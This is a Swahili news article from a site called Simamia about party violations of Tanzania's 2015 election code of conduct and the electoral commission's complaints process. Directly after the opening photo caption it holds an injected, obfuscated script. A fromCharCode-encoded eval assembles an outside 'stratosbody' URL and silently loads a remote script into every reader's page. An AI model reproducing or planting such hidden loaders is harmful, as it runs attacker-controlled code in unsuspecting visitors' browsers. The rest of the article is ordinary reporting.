Recent Comments

Maadili ya uchaguzi yakiukwa kweupe

By Baraka Bitariho Sep 20, 2015
<p>Mwenyekiti wa Tume ya Taifa ya Uchaguzi Jaji Mstaafu, Damian Lubuva akizungumza na wanahabari juu ya mambo yahusuyo tume hiyo. </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Mwenyekiti wa NEC Jaji mstaafu, Damian Lubuva
Mwenyekiti wa NEC Jaji mstaafu, Damian Lubuva

MAADILI ya Uchaguzi yaliyosainiwa na vyama 22 vya siasa kuwa vitayatekeleza wakati wa kampeni na baada ya kampeni, yameanza kukanyagwa na baadhi ya vyama hivyo.

Hata hivyo, karibu vyama vyote vilivyodhulumiwa haki zao katika kampeni hizo, vimekwepa kuchukua hatua walizokubaliana za kushitaki kwa Kamati ya Maadili ya Tume ya Taifa ya Uchaguzi (NEC) na kuishia kulalamika kwa vyombo vya habari.

Aidha, katika ukiukwaji huo wa maadili, vyama vya upinzani kwa kundi la Ukawa vya Chadema, CUF, NLD na NCCR-Mageuzi, navyo vimeshiriki katika kukiuka maadili hayo vyenyewe, katika mgogoro unaoendelea ndani ya umoja huo wa kuachiana majimbo na kata.

Mpaka jana mchana, kwa mujibu wa Kaimu Mkurugenzi wa Huduma za Sheria za NEC, Emmanuel Kawishe, Kamati ya Kusimamia Maadili ya Tume hiyo, ilikuwa imepokea na kufanyia kazi mashitaka mawili tu ya ukiukwaji wa maadili, ambayo ni tofauti na malalamiko y a l i y o r i p o t i wa katika v y o m b o mbalimbali vya habari.

Kawishe alitaja malalamiko hayo katika semina ya kamati hiyo ya maadili, iliyoandaliwa na Shirika la Maendeleo la Umoja wa Mataifa (UNDP), kuwa ni chama kimoja kuingilia ratiba ya kampeni ya kingine na picha ya mgombea mmoja kubandikwa juu ya picha ya mgombea mwingine tu.

“Siwezi kutaja vyama vilivyolalamikiwa wala uamuzi uliofanyika, ila tayari uamuzi umeshatolewa, lakini ikiwa vyama hawatatoa ma lalamiko kwa kamati ndani ya saa 72, haiwezekani kuchukuliwa hatua,” alisisitiza Kawishe alipoombwa ataje vyama vilivyolalamika na vilivyolalamikiwa.

NEC yashangazwa

Kawishe alisema vyama vyote vya siasa, vilisaini makubaliano hayo na vinatambua ikiwa kimoja kimekiuka maadili, chama kinacholalamika kinatakiwa kuhakikisha malalamiko yamefikishwa ndani ya NEC ndani ya saa 72, lakini cha ajabu hawapeleki malalamiko kwenye kamati hiyo.

Kutokana na hali hiyo, Kawishe alisema kwa kuwa baadhi ya matukio ya ukiukwaji maadili yameonekana, Tume imelazimika kutoa onyo kwa kuwa hakuna chama kilicholalamika. Hata hivyo, Kawishe alisema kamati hiyo itaendelea na kazi zake mpaka siku ya mwisho ya kampeni, ingawa imepokea malalamiko mawili tu.

Mjumbe wa kamati hiyo, ambaye ni Naibu Katibu Mkuu wa TLP, Dominata Rwechungura, alikiri kuwa ukiukwaji wa maadili upo kwa kiasi kikubwa, ikiwa ni pamoja na vitisho, chuki, jazba na taasisi za dini kuingilia mchakato wa uchaguzi, lakini hakuna malalamiko yanayopelekwa.

Ukawa kwa Ukawa

Miongoni mwa maadili yaliyovunjwa na chama kimoja kinachounda Ukawa dhidi ya kingine ndani ya umoja huo bila kuripotiwa NEC, ni pamoja na katazo lililopo katika sehemu ya pili, sehemu ndogo ya pili (a) ya Kanuni ya Maadili ya Uchaguzi wa Rais, Wabunge na Madiwani ya mwaka 2015.

Sehemu hiyo imeeleza “Viongozi wa vyama vya siasa, wagombea wao hawatakiwi kufanya fujo au kusababisha vurugu ya aina yoyote katika mkutano wa chama kingine.”

Ingawa hakuna mashitaka yaliyofikishwa Nec na Chadema ya kukiukwa kwa kifungu hicho, lakini Jumatano wiki hii katika mkutano wa kuzindua kampeni za mgombea ubunge wa Jimbo la Itilima mkoani Simiyu kupitia Chadema, Martine Magire, Chama cha Wananchi (CUF) kiliripotiwa kukanyaga kanuni hiyo kwa kuifanyia vurugu Chadema.

CUF inayomuunga mkono mgombea urais wa Chadema, Edward Lowassa chini ya makubaliano ya kuachiana majimbo na kata, iliripotiwa kukiuka kanuni hiyo, wakati aliyekuwa Mwenyekiti wa CUF, Profesa Ibrahim Lipumba alisaini makubaliano ya kutunza kanuni hizo Julai 27 mwaka huu.

Katika uzinduzi wa kampeni hizo za Chadema, uliohudhuriwa na mke wa Lowassa, Regina ambaye alikuwa mgeni rasmi, wafuasi wa CUF wakiongozwa na mgombea ubunge wa chama hicho katika jimbo hilo, Martine Makondo, walidaiwa kuvamia na kufanya vurugu katika uzinduzi huo.

Hali hiyo ilisababisha viongozi na walinzi wa Chadema, kumuondoa uwanjani hapo Regina, wakihofia usalama wake katika mkutano huo na baada hapo wakajaribu kutulizana na iliposhindikana, uzinduzi huo ukaahirishwa.

Kuthibitisha usahihi wa taarifa hiyo, Kamanda wa Polisi wa Simiyu, Gemin Mushy, alikaririwa akisema askari walitumia busara na kuepuka kumtoa mgombea huyo wa CUF jukwaani, kwa kuwa mazingira hayakuruhusu kumkakamta.

CCM Dodoma

Mbali na hilo la Ukawa kwa Ukawa, jana Msaidizi wa Katibu wa Mkoa wa Dodoma wa Masuala ya Siasa, Dunga Othman aliita waandishi wa habari na kulalamikia kitendo cha kuchanwa kwa mabango ya mgombea urais wa Chama Cha Mapinduzi (CCM), Dk John Magufuli na ya mgombea ubunge Jimbo la Dodoma Mjini, Antony Mavunde.

Kwa mujibu wa malalamiko ya Othman, mabango hayo yamechanwa katika maeneo mbalimbali huku zaidi ya bendera 250 zikishushwa na vijana, ambao wanaaminika kuwa ni wafuasi wa Chadema.

Tukio hilo ni ukiukwaji wa katazo lililopo katika sehemu hiyo ya pili, sehemu ndogo ya pili (f) linalosema; “Viongozi wa vyama vya siasa na wagombea wao hawaruhusiwi kuchafua, kubandua au kuharibu matangazo ya kampeni ya vyama vingine vya siasa na matangazo ya uchaguzi yanayotolewa na Tume ya Taifa ya Uchaguzi.”

Othman pia alidai pia CCM ilifanyiwa vurugu Septemba 11 mwaka huu, Lowassa alipokuwa akifanya mkutano mjini Dodoma, wakati Mavunde naye alikuwa akifanya mkutano kwenye Kata ya Msalato nje kidogo ya mji wa Dodoma.

Kwa mujibu wa madai hayo ya Othman, wafuasi wa Lowassa wakiwemo viongozi wa chama hicho walikusanyika karibu na Hoteli ya Nam, kusubiri msafara wa Mavunde na ulipopita walianza kushambulia msafara kwa mawe na kuvunja vioo vya magari, ambapo katika tukio hilo watu 11 walijeruhiwa.

Tukio hilo nalo ni kinyume na katazo lililopo katika sehemu hiyo ya pili, sehemu ndogo ya pili (c) linalosema; “Mtu yeyote haruhusiwi kuwa na/au kubeba silaha yoyote ikiwa ni pamoja na silaha za jadi au zana yoyote inayoweza kumdhuru mtu katika mkutano wa kampeni, au mkusanyiko wowote wa kisiasa.”

Madai mengine ya Othman ni kuhusu Chadema kupitia kikundi chao cha ulinzi cha ‘Red brigade’ kufanya mazoezi Dodoma kwa kusaidiana na walimu waliotoka nje ya mkoa huo, kwa lengo la kuwatisha wananchi ili wasijitokeze kupiga kura Oktoba 25.

“Wakikuta watu wamevaa sare za CCM wanazomea hata nguo za njano ukivaa ni tabu hizo si kampeni za kistaarabu,” alidai Othman matukio ambayo yanakiuka katazo lililopo katika sehemu hiyo ya pili sehemu ndogo ya pili (d), inayokataza kudhalilisha, kukebehi au kufedhehesha wanachama wa chama kingine na sehemu (b), inayokataza vitisho.

Imeandikwa na Theopista Nsanzugwanko, Dar na Sifa Lubasi, Dodoma.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com